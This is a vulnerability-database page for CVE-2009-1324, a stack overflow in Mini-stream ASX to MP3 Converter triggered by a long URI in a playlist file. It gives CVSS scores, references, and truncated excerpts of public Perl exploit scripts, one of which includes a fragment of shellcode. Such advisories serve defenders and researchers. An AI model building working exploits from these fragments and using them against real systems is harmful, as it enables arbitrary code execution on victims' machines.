Published: 17/04/2009 Updated: 29/09/2017

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 965

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Stack-based buffer overflow in Mini-stream ASX to MP3 Converter 3.0.0.7 allows remote malicious users to execute arbitrary code via a long URI in a playlist (.m3u) file.

Vulnerable Product	Search on Vulmon	Subscribe to Product
mini-stream asx to mp3 converter 3.0.0.7

#!/usr/bin/perl # ASX to MP3 Converter Version 3007 m3u Universal Stack Overflow Exploit # Disoverd By Cyber-Zone # Exploited By Stack my $Header = "#EXTM3U\n"; my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43 ...

#!/usr/bin/perl # # # ************************************************************************ # * ASX to MP3 Converter (M3U File) Local Stack Overflow POC * # ************************************************************************ # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYC ...

#!/usr/bin/perl # # # ************************************************************* # * WM Downloader (M3U File) Local Stack Overflow POC * # ************************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz ...

#!/usr/bin/perl # # # ********************************************************* # * RM Downloader (M3U File) Local Stack Overflow POC * # ********************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz : Hussin X ...

#!/usr/bin/perl # # # ************************************************************************ # * Mini-stream RM-MP3 Converter (M3U File) Local Stack Overflow POC * # ************************************************************************ # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYC ...

#!/usr/bin/perl # # # ************************************************************* # * Mini-stream Ripper (M3U File) Local Stack Overflow POC * # ************************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz ...

########################################################################################### # Exploit Title: ASX to MP3 Converter 275 stack buffer overflow # Date: 6 Oct 2014 # Exploit Author: Amir Reza Tavakolian # Vendor Homepage: binarylifeblogir/ # Software Link: downloadcnetcom/ASX-to-MP3-Converter/3000-2168_4-10385919html ...

CVE-2009-1324 - ASX to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3

CVE-2009-1324

CWE-119 http://secunia.com/advisories/34681 http://www.securityfocus.com/bid/34494 https://exchange.xforce.ibmcloud.com/vulnerabilities/49840 https://www.exploit-db.com/exploits/8412 https://www.exploit-db.com/exploits/8407 https://nvd.nist.gov https://github.com/war4uthor/CVE-2009-1324 https://www.exploit-db.com/exploits/8412/

CVE-2009-1324

Vulnerability Summary

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect